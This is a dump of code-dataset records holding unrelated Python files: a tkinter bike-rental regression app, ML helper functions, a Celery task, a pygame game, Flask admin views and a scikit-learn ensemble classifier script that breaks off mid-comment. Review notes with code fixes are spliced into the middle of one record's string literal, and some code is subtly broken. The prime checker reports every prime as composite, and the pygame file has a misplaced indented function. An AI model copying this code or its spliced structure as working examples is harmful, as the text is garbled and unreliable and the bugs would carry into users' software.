evaluation\\n\\n\")\n text.insert(END,\"mean absolute error : \"+str(MAE)+\"\\n\")\n text.insert(END,\"mean squared error: \"+str(MSE)+\"\\n\")\n text.insert(END,\"root mean squared error : \"+str(RMS)+\"\\n\")\n text.insert(END,\"R_square: \"+str(r_square)+\"\\n\")\n text.insert(END,\"Predicted Values on Test Data: \"+str(predictions)+\"\\n\")\n text.insert(END,\"\\n\\nFinal Predicted values on New Data:\\n\\n\")\n text.insert(END,res)\n text.insert(END,\"\\n\\nCheck the Project Directory for Submission CSV file\\n\\n\")\n text.insert(END,\"@@@------------------Thank You--------------------@@@\")\n \ndef lasso():\n # Lasso\n text.delete('1.0',END)\n from sklearn.linear_model import Lasso\n lassoReg = Lasso(alpha=0.1, normalize=True)\n lassoReg.fit(x_train,y_train)\n predictions = lassoReg.predict(x_test)\n res = pd.DataFrame(predictions)\n res.to_csv(\"lassoprediction_results.csv\")\n res['season_x']=x['season_x']\n #res.index = X_test.index # its important for comparison\n res['predictions'] = predictions\n res.to_csv(\"prediction_results.csv\")\n MAE= metrics.mean_absolute_error(y_test,predictions)\n MSE=metrics.mean_squared_error(y_test,predictions)\n RMS= np.sqrt(metrics.mean_squared_error(y_test,predictions))\n r_square = metrics.r2_score(y_test,predictions)\n \n text.insert(END,\"Error Rate evaluation\\n\\n\")\n text.insert(END,\"mean absolute error : \"+str(MAE)+\"\\n\")\n text.insert(END,\"mean squared error: \"+str(MSE)+\"\\n\")\n text.insert(END,\"root mean squared error : \"+str(RMS)+\"\\n\")\n text.insert(END,\"R_square: \"+str(r_square)+\"\\n\")\n text.insert(END,\"Predicted Values on Test Data: \"+str(predictions)+\"\\n\")\n text.insert(END,\"\\n\\nFinal Predicted values on New Data:\\n\\n\")\n text.insert(END,res)\n text.insert(END,\"\\n\\nCheck the Project Directory for Submission CSV file\\n\\n\")\n text.insert(END,\"@@@------------------Thank 
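RFT above hard-codes ['registered_y','casual_y'] as the columns SelectFromModel kept, which breaks silently the moment the importance ranking shifts. get_support() reports the surviving columns directly; regressor and the x/y splits are the record's:

import pandas as pd
from sklearn.feature_selection import SelectFromModel

selector = SelectFromModel(regressor, prefit=True)

kept = x_train.columns[selector.get_support()]     # columns that survived
print("selected features:", list(kept))

new_x_train = pd.DataFrame(selector.transform(x_train), columns=kept)
new_x_test = pd.DataFrame(selector.transform(x_test), columns=kept)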
You--------------------@@@\")\n\ndef input_values():\n text.delete('1.0',END)\n global new_x_train,new_x_test\n global RFT\n \n \n global registered_y#our 2nd input variable\n registered_y = float(entry1.get())\n\n global casual_y \n casual_y = float(entry2.get())\n\n #global casual_x\n #casual_x = float(entry3.get())\n\n list1=[[registered_y,casual_y]]\n parameters = {'bootstrap': False,\n 'min_samples_leaf': 3,\n 'n_estimators': 50,\n 'min_samples_split': 10,\n 'max_features': 'sqrt',\n 'max_depth': 6}\n \n sc_X = StandardScaler()\n x_train = sc_X.fit_transform(new_x_train)\n x_test = sc_X.transform(new_x_test)\n rf = RandomForestRegressor(**parameters)\n rf.fit(x_train, y_train)\n Prediction_result = rf.predict(list1)\n text.insert(END,\"New values are predicted from Random Forest Regressor\\n\\n\")\n text.insert(END,\"Predicted cnt_y for the New inputs\\n\\n\")\n text.insert(END,Prediction_result)\n\n \nfont = ('times', 14, 'bold')\ntitle = Label(root, text='Bike renting Using Machine Learning') \ntitle.config(font=font) \ntitle.config(height=2, width=120) \ntitle.place(x=0,y=5)\n\nfont1 = ('times',13 ,'bold')\nbutton1 = tk.Button (root, text='Upload Data1',width=13,command=upload_data1) \nbutton1.config(font=font1)\nbutton1.place(x=60,y=100)\n\nbutton2 = tk.Button (root, text='Upload Data2',width=13,command=upload_data2)\nbutton2.config(font=font1)\nbutton2.place(x=60,y=150)\n\nbutton3 = tk.Button (root, text='Data',width=13,command=data) \nbutton3.config(font=font1)\nbutton3.place(x=60,y=200)\n\n\nbutton4 = tk.Button (root, text='statistics',width=13,command=statistics)\nbutton4.config(font=font1) \nbutton4.place(x=60,y=250)\n\nbutton5 = tk.Button (root, text='Train & Test',width=13,command=train_test)\nbutton5.config(font=font1) \nbutton5.place(x=60,y=300)\n\ntitle = Label(root, text='Application of ML models')\n#title.config(bg='RoyalBlue2', fg='white') \ntitle.config(font=font1) \ntitle.config(width=25) \ntitle.place(x=250,y=70)\n\nbutton6 = tk.Button (root, text='Linear Regression',width=15,bg='pale green',command=LR)\nbutton6.config(font=font1) \nbutton6.place(x=300,y=100)\n\nbutton7 = tk.Button (root, text='KNN',width=15,bg='sky blue',command=KNN)\nbutton7.config(font=font1) \nbutton7.place(x=300,y=150)\n\nbutton8 = tk.Button (root, text='RFT',width=15,bg='orange',command=RFT)\nbutton8.config(font=font1) \nbutton8.place(x=300,y=200)\n\nbutton9 = tk.Button (root, text='Lasso',width=15,bg='violet',command=lasso)\nbutton9.config(font=font1) \nbutton9.place(x=300,y=250)\n\n\n\ntitle = Label(root, text='Enter Input values for the New Prediction')\ntitle.config(bg='black', fg='white') \ntitle.config(font=font1) \ntitle.config(width=40) \ntitle.place(x=60,y=380)\n\nfont3=('times',9,'bold')\ntitle1 = Label(root, text='*You Should enter scaled values between 0 and 1')\n \ntitle1.config(font=font3) \ntitle1.config(width=40) \ntitle1.place(x=50,y=415)\n\ndef clear1(event):\n entry1.delete(0, tk.END)\n\nfont2=('times',10)\nentry1 = tk.Entry (root) # create 1st entry box\nentry1.config(font=font2)\nentry1.place(x=60, y=450,height=30,width=150)\nentry1.insert(0,'registered_y')\nentry1.bind(\"\",clear1)\n\ndef clear2(event):\n entry2.delete(0, tk.END)\n\nfont2=('times',10)\nentry2 = tk.Entry (root) # create 1st entry box\nentry2.config(font=font2)\nentry2.place(x=315, y=450,height=30,width=150)\nentry2.insert(0,'casual_y')\nentry2.bind(\"\",clear2)\n\n\n\nPrediction = tk.Button (root, text='Prediction',width=15,fg='white',bg='green',command=input_values)\nPrediction.config(font=font1) 
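input_values above standardises the training features but then predicts on the raw user-entered pair, so the forest sees the new point on an entirely different scale (and the scaled x_test is never used). The fitted scaler has to transform the new input too:

from sklearn.preprocessing import StandardScaler
from sklearn.ensemble import RandomForestRegressor

sc_X = StandardScaler()
x_train_s = sc_X.fit_transform(new_x_train)      # features kept by RFT above

rf = RandomForestRegressor(n_estimators=50, max_depth=6, random_state=0)
rf.fit(x_train_s, y_train)

new_point = [[registered_y, casual_y]]           # values from the entry boxes
prediction = rf.predict(sc_X.transform(new_point))  # same scale as training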
\nPrediction.place(x=180,y=550)\n\n\n\nfont1 = ('times', 11, 'bold')\ntext=Text(root,height=32,width=90)\nscroll=Scrollbar(text)\ntext.configure(yscrollcommand=scroll.set,xscrollcommand=scroll.set)\ntext.place(x=550,y=70)\ntext.config(font=font1)\n\nroot.mainloop()\n\n\n","sub_path":"Bike_renting_analysis/bike_renting.py","file_name":"bike_renting.py","file_ext":"py","file_size_in_byte":12936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"68786271","text":"from sigmoid import sigmoid\n\n\ndef predict(theta, x, y):\n \"\"\"\n Gives the accuracy of the model based on the theta parameters.\n\n Parameters\n ----------\n theta : array_like\n Shape (1, n+1). Parameter values for function.\n\n x : array_like\n Shape (m, n+1). Features in model.\n\n y : array_like\n Shape (m, 1). Labels for each example.\n\n Returns\n -------\n accuracy : int\n Percentage of correct model predictions.\n \"\"\"\n\n correct = 0\n\n probability = sigmoid(x @ theta.T)\n predictions = [1 if x >= 0.5 else 0 for x in probability]\n\n for i in range(len(y)):\n if predictions[i] == y[i]:\n correct += 1\n accuracy = int((correct / len(y)) * 100)\n return accuracy\n","sub_path":"logistic-regression/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"335560597","text":"from celery import Celery\nfrom download import download_comics\n\napp = Celery(\"app\")\napp.config_from_object(\"celeryconfig\")\n\n\n@app.on_after_configure.connect\ndef setup_periodic_tasks(sender, **kwargs):\n sender.add_periodic_task(3600.0, download_task.s())\n\n\n@app.task\ndef download_task():\n print(\"Execute download task\")\n download_comics()\n","sub_path":"task2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"37478833","text":"n=int(input(\"Please input a positive integer number larger than 2.:\\n\"))\r\nr=2\r\nwhile n>1:\r\n if (n%r==0):\r\n print(\"It is a not prime number.\")\r\n break\r\n else:\r\n r=r+1\r\n if (r>n):\r\n print(\"It is a prime number.\")\r\n break\r\n \r\n \r\n","sub_path":"L2/L2_Q1.py","file_name":"L2_Q1.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"564218560","text":"# Purpose: Simple Image Plotting of Numpy Matrices\n#\n# Info: A set of of functions for simple plotting in Matplotlib\n# - include example plot function to inspect functionality\n#\n# Developed as part of the Software Agents Course at City University\n#\n# Dev: Dan Dixey and Enrico Lopedoto\n#\n#\nimport logging\nimport os\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nimport Plotting\n\nmatplotlib.style.use('ggplot')\n\n\nclass Plotting_tracks(object):\n \"\"\"\n\n Simple Image Plotting of Numpy Matrices\n\n \"\"\"\n\n def __init__(self):\n logging.debug(\"Loaded Plotting Function\")\n\n @staticmethod\n def example():\n \"\"\" To run the example on Command Line:\n\n Input\n #####\n import Plotting\n Plotting_track().example()\n\n Output\n ######\n Saved plot in directory\n Plot Show in new window\n\n \"\"\"\n fig, ax = plt.subplots()\n\n image = np.random.uniform(size=(10,\n 10)) # Plotting Matrix\n\n ax.imshow(image,\n cmap=plt.get_cmap('RdGy'),\n interpolation='nearest')\n\n # Set the title\n ax.set_title('Example 
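The L2_Q1.py prime test above reports every prime as composite: for prime n the trial divisor r eventually reaches n itself, n % n == 0 fires, and the "not prime" branch wins before r > n is ever tested. Trial division also only needs to run while r*r <= n; a corrected version:

n = int(input("Please input a positive integer number larger than 2.:\n"))
r = 2
is_prime = True
while r * r <= n:          # divisors above sqrt(n) pair with ones below it
    if n % r == 0:
        is_prime = False
        break
    r += 1
print("It is a prime number." if is_prime else "It is a not prime number.")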
Grid')\n\n # Move left and bottom spines outward by 10 points\n ax.spines['left'].set_position(('outward', 10))\n ax.spines['bottom'].set_position(('outward', 10))\n\n # Hide the right and top spines\n ax.spines['right'].set_visible(False)\n ax.spines['top'].set_visible(False)\n\n # Only show ticks on the left and bottom spines\n ax.yaxis.set_ticks_position('left')\n ax.xaxis.set_ticks_position('bottom')\n\n name = 'grid_world.png'\n plt.savefig(os.path.join(os.getcwd(),\n 'Model',\n 'Obstacle_Img',\n name))\n plt.show()\n\n @staticmethod\n def plot_grid(matrix, name, folder):\n \"\"\" Plot Grid function will attempt to plot a matrix\n\n Input\n #####\n numpy matrix\n\n Output\n ######\n Saved plot in directory\n Plot Show in new window\n\n \"\"\"\n if isinstance(matrix, np.ndarray):\n plt.ioff()\n fig, ax = plt.subplots()\n image = matrix\n ax.imshow(image,\n cmap=plt.get_cmap('gnuplot'),\n interpolation='nearest')\n\n # Set the title\n ax.set_title('Plot of {}'.format(name))\n\n # Move left and bottom spines outward by 10 points\n ax.spines['left'].set_position(('outward', 10))\n ax.spines['bottom'].set_position(('outward', 10))\n\n # Hide the right and top spines\n ax.spines['right'].set_visible(False)\n ax.spines['top'].set_visible(False)\n\n # Only show ticks on the left and bottom spines\n ax.yaxis.set_ticks_position('left')\n ax.xaxis.set_ticks_position('bottom')\n\n # Save and Show Plot\n name = name + '.png'\n plt.savefig(os.path.join(os.getcwd(),\n 'Model',\n folder,\n name))\n\n return name\n\n else:\n logging.error(\"Data provided was not a Matrix\")\n return 'Error'\n\n\nclass plotting_model(object):\n \"\"\"\n\n Plotting the Q-Matrix from model [1, 2]\n\n \"\"\"\n\n def __init__(self):\n self.DF = None\n self.Q_Matrix = None\n self.DF_new = None\n self.Q = None\n\n def get_q_matrix(self, model_q=None, nb_actions=None):\n \"\"\"\n Function to Generate the Reward Matrix\n\n :param model_q: dict\n :param nb_actions: int\n :return: None\n \"\"\"\n assert isinstance(model_q, dict) and isinstance(nb_actions, int), \\\n \"Object Types not as Expected\"\n\n self.Q = model_q\n length = len(model_q)\n splitting_keys = list(model_q)\n self.Q_Matrix = np.zeros((length, nb_actions))\n\n for val, key in enumerate(splitting_keys):\n self.Q_Matrix[val][key[1]] = model_q[key]\n\n def plot_q_matrix(self, f_name):\n \"\"\"\n Plot the R-Matrix\n\n :param f_name: str\n :return: None (saves to folder)\n \"\"\"\n assert self.Q_Matrix is not None, \\\n \"Call get_q_matrix before using this function\"\n\n plotter = Plotting.Plotting_tracks()\n plotter.plot_grid(matrix=self.Q_Matrix,\n name=f_name,\n folder='Q_Matrix_Plots')\n\n def get_details(self, ):\n \"\"\"\n Get basic metrics about the States\n\n :return: dict\n \"\"\"\n assert self.Q is not None, \\\n \"Call get_q_matrix before using this function\"\n\n min_q = min(self.Q.values())\n max_q = max(self.Q.values())\n data = self.Q.values()\n q_data = dict(min=min_q,\n max=max_q,\n data=data)\n\n return q_data\n","sub_path":"Model/Plotting.py","file_name":"Plotting.py","file_ext":"py","file_size_in_byte":5110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"333300030","text":"import pygame\nimport time\nimport random\npygame.init()\n\ndisplay_width = 800\ndisplay_height = 600\nblack = (0, 0, 0)\nwhite = (255,255,255)\nred = (255,0,0)\ncar_width = 53\n\ngameDisplay = pygame.display.set_mode((display_width,display_height))\npygame.display.set_caption('Cross The Street')\nclock = 
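get_q_matrix above gives every (state, action) key its own row, so a state with several actions is smeared across several mostly-zero rows. If the dict keys really are (state, action) pairs, as key[1] suggests, indexing rows by state packs the table the way a Q-matrix is normally read; a sketch under that assumption:

import numpy as np

def q_dict_to_matrix(model_q, nb_actions):
    """model_q: {(state, action): value}. One row per distinct state."""
    states = sorted({state for state, _ in model_q})
    row_of = {state: i for i, state in enumerate(states)}
    q = np.zeros((len(states), nb_actions))
    for (state, action), value in model_q.items():
        q[row_of[state], action] = value
    return q, states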
pygame.time.Clock()\nCarimg = pygame.image.load('Car.png')\ndef score_count(count):\n font = pygame.font.SysFont(None, 25)\n text = font.render(\"SCORE: \"+str(count),True, red)\n gameDisplay.blit(text,(0,0))\ndef Car(x,y):\n gameDisplay.blit(Carimg,(x,y))\n\ndef blocks(thingx, thingy, thingw, thingh, color):\n pygame.draw.rect(gameDisplay, color, [thingx,thingy,thingw,thingh])\n\n\n\ndef crash():\n message_display('Crash')\ndef message_display(text):\n largeText = pygame.font.Font('freesansbold.ttf', 115)\n TextSurf, TextRect = text_objects(text,largeText)\n TextRect.center = ((display_width/2),(display_height/2))\n gameDisplay.blit(TextSurf, TextRect)\n pygame.display.update()\n time.sleep(2)\n game_loop()\n\ndef text_objects(text, font):\n textSurface = font.render(text, True, black)\n return textSurface, textSurface.get_rect()\n\n def things(thingx, thingy, thingw, thingh, color):\n pygame.draw.rect(gameDisplay, color, [thingx,thingy,thingw,thingh])\n \n\n \ndef game_loop():\n x = display_width*0.45\n y = display_height*0.8\n x_change = 0\n thing_startx = random.randrange(0,display_width)\n thing_starty = -600\n thing_speed = 4\n thing_width = 100\n thing_height = 100\n score = 0\n crashed = False \n while not crashed:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n x_change = -100\n elif event.key == pygame.K_RIGHT:\n x_change = 100\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\n x_change=0\n x+=x_change\n gameDisplay.fill(white)\n blocks(thing_startx, thing_starty, thing_width, thing_height, black)\n thing_starty += thing_speed\n Car(x,y)\n score_count(score)\n \n if x>(display_width-car_width) or x<0:\n crash()\n if thing_starty > display_height:\n thing_starty = 0-thing_height\n thing_startx = random.randrange(0, display_width)\n score+=1\n thing_speed += 1\n thing_width += (score+1.2)\n if y < thing_starty+thing_height:\n #log message\n print('past y')\n if x > thing_startx and x < thing_startx + thing_width or x+car_width> thing_startx and x+car_width', methods=['GET', 'PUT', 'DELETE'])\n@jwt_required()\n@intercept_admin_user\ndef item(id):\n if request.method == 'GET':\n try:\n item = get_group(id, True)\n return default_return(200, 2, item)\n except Exception as e:\n raise e\n\n if request.method == 'PUT':\n try:\n item = update_group(id, True)\n return default_return(200, 3, item)\n except Exception as e:\n raise e\n\n if request.method == 'DELETE':\n try:\n delete_group(id)\n return default_return(204, 4)\n except Exception as e:\n raise e\n\n\n@bp.route('', methods=['GET', 'POST'])\n@jwt_required()\n@intercept_admin_user\ndef items():\n if request.method == 'GET':\n try:\n items, items_paginate = gets_group(True)\n return default_return(200, 2, items, items_paginate)\n except Exception as e:\n raise e\n\n if request.method == 'POST':\n try:\n item = create_group(schema=True)\n return default_return(201, 1, item)\n except Exception as e:\n raise e\n","sub_path":"sensi-backend-init/app/admin/group/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"118153964","text":"# CBC Classifier\nfrom time import gmtime, strftime\ngmt=strftime(\"%H:%M:%S\", gmtime())\nprint(gmt)\n\n#def CBC(dataFile,multiDatafile=True,rowIndex=None,columnIndex=None,numClasses=None,numFeatures=None,numTests=None):\nimport 
warnings\nwarnings.filterwarnings(\"ignore\")\nimport time\nstart = time.time()\nimport numpy as np\nimport xlrd\nfrom sklearn.model_selection import train_test_split\n#from sklearn.preprocessing import scale\n#import matplotlib.pyplot as plt\n#from mpl_toolkits.mplot3d import Axes3D\n# \nimport os\nmultiDatafile=True\nforcePrediction=True\n# dataFile='Iris'\nnumTests=20\ndataFile = '/Users/admin/Desktop/Files_for_Bhaskar/Classifier/ARPA_Metals/100_Data' \n# dataFile = '/Users/admin/Desktop/Bracket'\n# dataFile = '/Users/admin/Desktop/Desktop_Stuff/NFL'\nfile_used='Metals'\n# print('NFL')\nnumClasses=28 # metals=28, bracket=2, NFL=2 & off for iris and digits\nnumFeatures=6 # metals=6, bracket=20, NFL=22 & off for iris and digits\nrowIndex=2 # metals=2, bracket=1, NFL=37 & off for iris and digits\ncolumnIndex=1 # metals=1, bracket=2, NFL=1 & off for iris and digits\nif multiDatafile:\n    dataPaths=[]\n    for root,dirs,files in os.walk(dataFile):\n        for name in files:\n            dataPaths.append(os.path.join(root,name)) \n    # keep only Excel files; filtering with a comprehension avoids removing items\n    # from dataPaths while iterating over it, which silently skips entries\n    dataPaths=[p for p in dataPaths if p.endswith('.xlsx')]\n    dataPaths=np.sort(dataPaths)\n\n    readings=0\n    readings1=[]\n    classes=[]\n    class_name=[]\n    n_samples=[]\n    data_ws=[]\n    \n    # Each class must have its own data file. Based on current filename used below, \n    # each file would be named Book1_new0, Book1_new1,... and so forth\n    \n    # This code reads Excel files only\n    # File location will change for each computer \n    for i in range(numClasses):\n        data_wb = xlrd.open_workbook(dataPaths[i])\n        index = 0 # This value corresponds to the worksheet within each Excel file \n        # where the dataset can be found, where 0 corresponds to the first worksheet. \n        # All files must have data on the same worksheet index\n        data_ws.append(data_wb.sheet_by_index(index)) # Combines each datafile into \n        # one file (data_ws)\n        col_values = data_ws[i].col_values(0)\n        \n        \n        # <_____**** USER INPUT ****_____>: how many rows and columns need to be skipped \n        # before the dataset begins, i.e. for rows that may include header \n        # information or columns that may include sample numbers\n        # numTests = how many \"new data\" tests should be taken from each class\n\n        \n        # The next step creates a list of alloy names from header information \n        # found in each data file \n        \n        # <_____**** USER INPUT ****_____>: \"(0,1)\" corresponds to 1st row, 2nd column, and may \n        # need to be altered depending on where the class label is located in the worksheet. 
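\n        # e.g. a class label kept in spreadsheet cell B1 is what cell(0,1).value reads below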
\n classes.append(data_ws[i].cell(0,1).value)\n \n # Calculates number of samples for each class excluding those \n # used for \"new data\" validation (n_samples), the number of samples for each\n # class including those used for \"new data\" (readings1) and the total number of \n # samples for all classes combined (readings)\n n_samples.append(len(col_values)-rowIndex-numTests)\n readings1.append(n_samples[i]+numTests)\n readings += (n_samples[i]+numTests)\n \n # Creates data array with just the dataset values (no header information or skipped rows/columns) \n classes=np.sort(classes)\n for i in range(numClasses):\n class_name.append([i,str(classes[i])])\n prev=0\n data_all1=np.zeros((readings,numFeatures))\n color=np.zeros((readings,1))\n for i in range(numClasses):\n for j in range(readings1[i]):\n for k in range(numFeatures):\n data_all1[j+prev,k]=data_ws[i].cell(rowIndex+j,k+columnIndex).value\n color[j+prev,0]=i\n prev += readings1[i]\n \n # rg loop below performs 10 iterations of random permutations of the dataset. This is done in order\n # to verify that there is no data drift, i.e., where all of the samples at the\n # beginning of the dataset might be similar to one another but slightly different than\n # all of the samples at the end of the dataset\n rg=0 \n data_rand=[]\n prev=0\n for i in range(numClasses):\n rng = np.random.RandomState(rg)\n permutation=rng.permutation(int(readings1[i]))\n data_all2=data_all1[prev:prev+int(readings1[i])]\n data_rand.append(data_all2[permutation])\n prev += int(readings1[i])\n \n ncs=0\n for i in range(numClasses):\n ncs += int(n_samples[i])\n prev=0\n data=np.zeros((ncs,numFeatures))\n for i in range(numClasses):\n for j in range(int(n_samples[i])):\n for k in range(numFeatures):\n data[j+prev,k]=data_rand[i][j][k]\n prev += int(n_samples[i])\n\n # Generates class numbers that will be used as targets during testing \n targets=[]\n for i in range(numClasses): \n for j in range(int(n_samples[i])):\n targets.append(i)\n targets=np.array(targets)\n \n # Creates \"new data\" array for validation \n prev=0\n new_data=np.zeros((numClasses*numTests,numFeatures))\n for i in range(numClasses):\n for j in range(numTests):\n for k in range(numFeatures):\n new_data[j+i*numTests,k]=data_rand[i][int(n_samples[i])+j][k]\n prev += int(readings1[i])\n\n# Generates class numbers that will be used as targets for new data\n new_targets_num=[]\n for i in range(numClasses):\n for j in range(numTests):\n new_targets_num.append(class_name[i][0])\n \nelif dataFile == \"Iris\":\n from sklearn import datasets\n iris = datasets.load_iris()\n data_all1 = iris.data\n targets_all1 = iris.target\n numClasses = len(np.unique(targets_all1))\n numFeatures = len(data_all1[0])\n readings1 = np.zeros(numClasses)\n n_samples = np.zeros(numClasses)\n \n class_name=[]\n data_all=[]\n targets_all=[]\n for i in range(numClasses):\n data_all2=[]\n targets_all2=[]\n for j in range(len(targets_all1)):\n if targets_all1[j] == np.unique(targets_all1)[i]:\n readings1[i] += 1\n data_all2.append(data_all1[j])\n targets_all2.append(targets_all1[j])\n data_all.append(data_all2)\n targets_all.append(targets_all2)\n n_samples[i] = int(readings1[i]) - numTests\n class_name.append([i,iris.target_names[i]]) \n\n \n ncs=0\n for i in range(numClasses):\n ncs += int(n_samples[i])\n data=np.zeros((ncs,numFeatures))\n targets=np.zeros((ncs,1))\n prev=0\n for i in range(numClasses):\n for j in range(int(n_samples[i])):\n for k in range(numFeatures):\n data[j+prev,k]=data_all[i][j][k]\n 
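# store the integer class label once this sample's feature row is filled\n            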
targets[j+prev]=int(targets_all[i][j])\n prev += int(n_samples[i])\n data=list(data)\n targets=list(targets)\n \n new_data=np.zeros((numClasses*numTests,numFeatures))\n new_targets_num=np.zeros((numClasses*numTests,1))\n for i in range(numClasses):\n for j in range(numTests):\n for k in range(numFeatures):\n new_data[j+i*numTests,k]=data_all[i][int(n_samples[i])+j][k]\n new_targets_num[j+i*numTests]=targets_all[i][int(n_samples[i])+j]\n new_data=list(new_data)\n new_targets_num=list(new_targets_num) \n \n \nelif dataFile == \"Digits\":\n from sklearn import datasets\n digits = datasets.load_digits()\n targets_all1 = digits.target\n totalSamples = len(targets_all1)\n numClasses = len(np.unique(targets_all1))\n data_all1 = digits.images.reshape((totalSamples,-1))\n \n numFeatures = len(data_all1[0])\n readings1 = np.zeros(numClasses)\n n_samples = np.zeros(numClasses)\n class_name=[]\n data_all=[]\n targets_all=[]\n for i in range(numClasses):\n data_all2=[]\n targets_all2=[]\n for j in range(len(targets_all1)):\n if targets_all1[j] == np.unique(targets_all1)[i]:\n readings1[i] += 1\n data_all2.append(data_all1[j])\n targets_all2.append(targets_all1[j])\n data_all.append(data_all2)\n targets_all.append(targets_all2)\n n_samples[i] = int(readings1[i]) - numTests\n class_name.append([i,digits.target_names[i]]) \n \n ncs=0\n for i in range(numClasses):\n ncs += int(n_samples[i])\n data=np.zeros((ncs,numFeatures))\n targets=np.zeros((ncs,1))\n prev=0\n for i in range(numClasses):\n for j in range(int(n_samples[i])):\n for k in range(numFeatures):\n data[j+prev,k]=data_all[i][j][k]\n targets[j+prev]=int(targets_all[i][j])\n prev += int(n_samples[i])\n data=list(data)\n targets=list(targets)\n \n new_data=np.zeros((numClasses*numTests,numFeatures))\n new_targets_num=np.zeros((numClasses*numTests,1))\n for i in range(numClasses):\n for j in range(numTests):\n for k in range(numFeatures):\n new_data[j+i*numTests,k]=data_all[i][int(n_samples[i])+j][k]\n new_targets_num[j+i*numTests]=targets_all[i][int(n_samples[i])+j]\n new_data=list(new_data)\n new_targets_num=list(new_targets_num) \n\nend = time.time()\nelapsed_time = end-start\nprint(\"Data formatting done in %0.1f seconds\" % elapsed_time)\n \n\n\n# <_____**** USER INPUT ****_____>: After verification that no drift is present, \"rg in range(10)\" can be\n# replaced with \"rg in range(1)\" in order to eliminate unnecessary computations\n\n\n ############### MODEL BUILDER ###################\n \nfrom sklearn.cluster import KMeans\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.ensemble import RandomForestClassifier, BaggingClassifier,ExtraTreesClassifier,GradientBoostingClassifier,VotingClassifier, AdaBoostClassifier\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis\nfrom sklearn.svm import SVC\n\n# Calculates Centroids for each class (C0_samples) that will be used\n# for initial guesses for KMeans\nmean_samples=np.zeros((numClasses,numFeatures)) \nC0_samples=np.zeros((numClasses,numFeatures))\nds=[]\ndata_s=[]\nprev=0\ndata_samples=[ds]*numClasses\nfor i in range(numClasses):\n data_samples[i]=[ds]*numFeatures\n for k in range(numFeatures):\n for j in range(int(n_samples[i])):\n data_s.append(data[j+prev][k])\n data_samples[i][k]=data_s\n data_s=[]\n data_samples[i][k]=np.array(data_samples[i][k]).astype(float)\n 
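# each class's per-feature mean also seeds the initial KMeans centroids (C0_samples)\n        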
mean_samples[i,k]=float(np.mean(data_samples[i][k]))\n C0_samples[i,k]=mean_samples[i][k]\n prev += int(n_samples[i])\n\n# <_____**** USER INPUT ****_____>: Create any number of classifiers you wish to test. \n# Parameters for each classifier can be altered at the user's discretion \n\n# When there is a tie in Test Data Accuracy (PF Value) the ensemble picks whichever\n# one is listed higher here, so I usually look at what the best individual classifier would be,\n# i.e. best_ind_classifier, and list it as classifier1 \n\n# Combines all classifiers into one list\nclassifier1=BaggingClassifier(base_estimator=RandomForestClassifier(random_state=0),random_state=0)\nclassifier1_name = 'Bagging'\n\nclassifier2=RandomForestClassifier(random_state=0)\nclassifier2_name = 'Random Forest'\n\nclassifier3=KNeighborsClassifier(n_neighbors=3)\nclassifier3_name = 'KNeighbors'\n\nclassifier4=DecisionTreeClassifier(random_state=0)\nclassifier4_name = 'Decision Tree'\n\nclassifier5=GaussianNB()\nclassifier5_name = 'Gaussian Naive Bayes'\n\nclassifier6=QuadraticDiscriminantAnalysis()\nclassifier6_name = 'Quadratic Discriminant Analysis'\n\nclassifier7=LinearDiscriminantAnalysis()\nclassifier7_name = 'Linear Discriminant Analysis'\n\nclassifier8=SVC(kernel='linear',gamma=0.001,random_state=0,probability=True)\nclassifier8_name = 'SVC'\n\nclassifier9=ExtraTreesClassifier(random_state=0)\nclassifier9_name = 'Extra Trees'\n\nclassifier10=KMeans(n_clusters = numClasses,init=C0_samples, random_state=0)\nclassifier10_name = 'KMeans'\n\nclassifier11=GradientBoostingClassifier(random_state=0)\nclassifier11_name = 'Gradient Boosting'\n\nclassifier12=AdaBoostClassifier(base_estimator=RandomForestClassifier(random_state=0),random_state=0)\nclassifier12_name='AdaBoost'\n#\nclassifier13=VotingClassifier(\n estimators=[('bag', classifier1),('rf', classifier2),('knn', classifier3),('dt', classifier4),\n ('gnb', classifier5),('qda', classifier6),('lda',classifier7),('svc', classifier8),('ext', classifier9),\n ('gb', classifier11),('ada', classifier12)\n ],\n voting='soft'\n )\n#classifier13=VotingClassifier(\n# estimators=[('rf', classifier2),('svc', classifier8),('lda',classifier7)],\n# voting='soft'\n# )\nclassifier13_name = 'Voting'\n\n\n# classifier=[classifier1,classifier2,classifier3,classifier4,classifier5,\n# classifier6,classifier7,classifier8,classifier9,classifier10,classifier11,classifier12,classifier13]\n# classifier_name=[classifier1_name,classifier2_name,classifier3_name,classifier4_name,\n# classifier5_name,classifier6_name,classifier7_name,classifier8_name,\n# classifier9_name,classifier10_name,classifier11_name,classifier12_name,classifier13_name] \n\nclassifier=[classifier1,classifier2,classifier3,classifier4,classifier5,\n classifier6,classifier7,classifier9,classifier10,classifier11,classifier12]\nclassifier_name=[classifier1_name,classifier2_name,classifier3_name,classifier4_name,\n classifier5_name,classifier6_name,classifier7_name,\n classifier9_name,classifier10_name,classifier11_name,classifier12_name] \n\n# classifier=[classifier1]\n# classifier_name=[classifier1_name]\n\n##################### CLASSIFIER LOOPER ########################\ncurrent_t = time.time()\nct = current_t - start\nprint(\"classifier loop start - %0.1f seconds\" % (ct))\n# This section loops through all classifiers at all chosen training/testing\n# splits for various random state splittings and finds the best classifier\n# and optimal T/T split for each class within the dataset\n\n# <_____**** USER 